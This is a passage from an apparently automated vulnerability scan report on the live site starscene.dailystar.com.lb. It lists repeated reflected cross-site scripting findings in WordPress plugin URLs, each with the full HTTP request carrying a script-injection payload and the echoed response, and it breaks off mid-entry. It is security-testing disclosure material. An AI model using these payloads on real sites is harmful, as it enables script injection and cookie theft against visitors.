X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:04 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable/addtofavorites.js23774\"><script>alert(1)</script>ff723871d47?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.293. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d31"><script>alert(1)</script>f9090a69f3c was submitted in the REST URL parameter 1. This input was echoed as b2d31\"><script>alert(1)</script>f9090a69f3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentb2d31"><script>alert(1)</script>f9090a69f3c/plugins/sociable/sociable.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:44 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentb2d31\"><script>alert(1)</script>f9090a69f3c/plugins/sociable/sociable.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.294. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8fc8"><script>alert(1)</script>c3d97fdb428 was submitted in the REST URL parameter 2. This input was echoed as f8fc8\"><script>alert(1)</script>c3d97fdb428 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf8fc8"><script>alert(1)</script>c3d97fdb428/sociable/sociable.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:55 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsf8fc8\"><script>alert(1)</script>c3d97fdb428/sociable/sociable.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.295. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5864b"><script>alert(1)</script>079c87b45a3 was submitted in the REST URL parameter 3. This input was echoed as 5864b\"><script>alert(1)</script>079c87b45a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable5864b"><script>alert(1)</script>079c87b45a3/sociable.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable5864b\"><script>alert(1)</script>079c87b45a3/sociable.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.296. http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e908b"><script>alert(1)</script>d798268978b was submitted in the REST URL parameter 4. This input was echoed as e908b\"><script>alert(1)</script>d798268978b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/sociable.csse908b"><script>alert(1)</script>d798268978b?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/sociable/sociable.csse908b\"><script>alert(1)</script>d798268978b?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.297. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b02"><script>alert(1)</script>1abba2b880f was submitted in the REST URL parameter 1. This input was echoed as 47b02\"><script>alert(1)</script>1abba2b880f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content47b02"><script>alert(1)</script>1abba2b880f/plugins/world-cup-predictor/css/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:46 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content47b02\"><script>alert(1)</script>1abba2b880f/plugins/world-cup-predictor/css/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.298. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9513"><script>alert(1)</script>d24334c8c0c was submitted in the REST URL parameter 2. This input was echoed as e9513\"><script>alert(1)</script>d24334c8c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginse9513"><script>alert(1)</script>d24334c8c0c/world-cup-predictor/css/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginse9513\"><script>alert(1)</script>d24334c8c0c/world-cup-predictor/css/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.299. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7857"><script>alert(1)</script>6753ffa0f83 was submitted in the REST URL parameter 3. This input was echoed as d7857\"><script>alert(1)</script>6753ffa0f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictord7857"><script>alert(1)</script>6753ffa0f83/css/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:44 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictord7857\"><script>alert(1)</script>6753ffa0f83/css/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.300. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1af4"><script>alert(1)</script>4c08046b926 was submitted in the REST URL parameter 4. This input was echoed as f1af4\"><script>alert(1)</script>4c08046b926 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/cssf1af4"><script>alert(1)</script>4c08046b926/style.css?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:29 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/cssf1af4\"><script>alert(1)</script>4c08046b926/style.css?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.301. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f277"><script>alert(1)</script>ed00e9a8766 was submitted in the REST URL parameter 5. This input was echoed as 3f277\"><script>alert(1)</script>ed00e9a8766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/world-cup-predictor/css/style.css3f277"><script>alert(1)</script>ed00e9a8766?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/world-cup-predictor/css/style.css3f277\"><script>alert(1)</script>ed00e9a8766?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.302. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95530"><script>alert(1)</script>c4240e06647 was submitted in the REST URL parameter 1. This input was echoed as 95530\"><script>alert(1)</script>c4240e06647 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content95530"><script>alert(1)</script>c4240e06647/plugins/world-cup-predictor/js/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:05 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content95530\"><script>alert(1)</script>c4240e06647/plugins/world-cup-predictor/js/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.303. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/world-cup-predictor/js/wcp.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e4ed"><script>alert(1)</script>c4029a74899 was submitted in the REST URL parameter 2. This input was echoed as 9e4ed\"><script>alert(1)</script>c4029a74899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9e4ed"><script>alert(1)</script>c4029a74899/world-cup-predictor/js/wcp.js?ver=2.9.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=3ceb23bd7c438cf6b1b2042f97a50460
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins9e4ed\"><script>alert(1)</script>c4029a74899/world-cup-predictor/js/wcp.js?ver=2.9.2'; }); return true;" >
...[SNIP]...

4.304. http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 3]

Summary

